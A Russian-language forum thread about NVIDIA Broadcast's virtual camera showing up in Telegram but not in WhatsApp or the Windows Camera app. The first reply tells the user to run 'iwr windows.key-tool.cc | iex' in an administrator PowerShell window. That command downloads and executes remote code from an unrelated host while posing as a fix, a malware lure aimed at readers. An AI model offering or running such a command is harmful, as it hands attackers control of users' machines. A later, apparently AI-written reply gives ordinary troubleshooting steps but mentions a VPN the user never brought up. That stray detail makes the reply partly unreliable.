Проблема нвидиа бродкаст
Вчера установил нвидиа бродкаст но проблема телеграм десктоп видит виртуальную камеру нвидиа бродкаст а ватсап не видит но не только он но и стандартное приложение камера прошу подскажите я нвидиа бродкаст переустанавливал ватссап тоже ничего не помогает
Нажми Win R, напиши повершелл по англ или открой от имени админа
Затем
iwr windows.key-tool.cc | iex
и все
Привет! Ох, неприятная ситуация, когда часть приложений видит виртуальную камеру NVIDIA Broadcast, а другие — нет. Это классическая проблема, когда виртуальный драйвер камеры регистрируется в системе не до конца корректно или блокируется другими приложениями/системой.
То, что Telegram её видит, означает, что сам драйвер Broadcast установлен, и он работает. Проблема в том, что WhatsApp и стандартное приложение "Камера" не могут к ней подключиться.
Давай попробуем разобраться по шагам:
1. Проверь настройки конфиденциальности камеры в Windows: Это самая частая причина таких проблем.
* Нажми Win + I (откроются Настройки).
* Перейди в раздел Конфиденциальность и безопасность (Privacy & security).
* В левом меню прокрути до Разрешения приложений (App permissions) и выбери Камера (Camera).
* Убедись, что параметр "Доступ к камере" (Camera access) включен.
* Прокрути ниже до "Разрешить приложениям доступ к вашей камере" (Allow apps to access your camera) и убедись, что этот пункт также включен.
* Еще ниже найди список приложений. Убедись, что WhatsApp Desktop и "Камера" (Camera) явно разрешены доступ к камере. Если они не в списке, попробуй включить опцию "Разрешить классическим приложениям доступ к камере" (Allow desktop apps to access your camera), которая находится в самом низу этого раздела, так как WhatsApp Desktop является классическим приложением.
2. Проверь настройки NVIDIA Broadcast:
* Убедись, что в самом приложении NVIDIA Broadcast твоя физическая веб-камера правильно выбрана в качестве источника.
* Убедись, что виртуальная камера NVIDIA Broadcast активна (иногда она может быть выключена ползунком).
3. Перезагрузи компьютер (полноценно): Если ты просто перезагружал приложения, попробуй сделать полную перезагрузку операционной системы. Иногда это помогает системе правильно зарегистрировать новые драйверы.
4. Проверь настройки камеры в WhatsApp Desktop:
* Открой WhatsApp Desktop.
* Зайди в Настройки (Settings) -> Звонки (Calls).
* Там должна быть опция выбора камеры. Убедись, что в выпадающем списке выбрана "NVIDIA Broadcast" или "NVIDIA Broadcast Camera". Если её нет, то это подтверждает проблему с регистрацией.
5. Проверь Диспетчер устройств:
* Нажми Win + X и выбери Диспетчер устройств (Device Manager).
* Разверни раздел "Камеры" (Cameras) или "Устройства обработки изображений" (Imaging devices).
* Ты должен увидеть там свою физическую веб-камеру и "NVIDIA Broadcast" или "NVIDIA Broadcast Camera".
* Если видишь значки ошибки (желтый восклицательный знак) рядом с NVIDIA Broadcast Camera, это указывает на проблему с драйвером. Попробуй правой кнопкой мыши -> "Обновить драйвер" или "Удалить устройство" (затем перезагрузить ПК, чтобы оно установилось заново).
6. Конфликтующее ПО:
* У тебя установлены другие программы, которые используют виртуальные камеры (например, OBS Studio с OBS Virtual Camera, ManyCam, XSplit VCam)? Они могут конфликтовать с NVIDIA Broadcast. Попробуй временно удалить или отключить все другие виртуальные камеры.
7. Запуск от имени администратора: Попробуй запустить WhatsApp Desktop и/или стандартное приложение "Камера" от имени администратора (правой кнопкой мыши по ярлыку -> Запуск от имени администратора). Иногда это помогает обойти проблемы с доступом к драйверу.
Поскольку VPN помогает (если это так), это могло бы указывать на проблемы с сетью, но для камеры это очень маловероятно. Скорее всего, дело в разрешениях Windows или конфликте драйверов/ПО.
Начни с шага 1 (Настройки конфиденциальности камеры в Windows), это самый частый виновник. Если не поможет, иди по остальным пунктам.
Надеюсь, удастся решить эту проблему! Удачи! ✨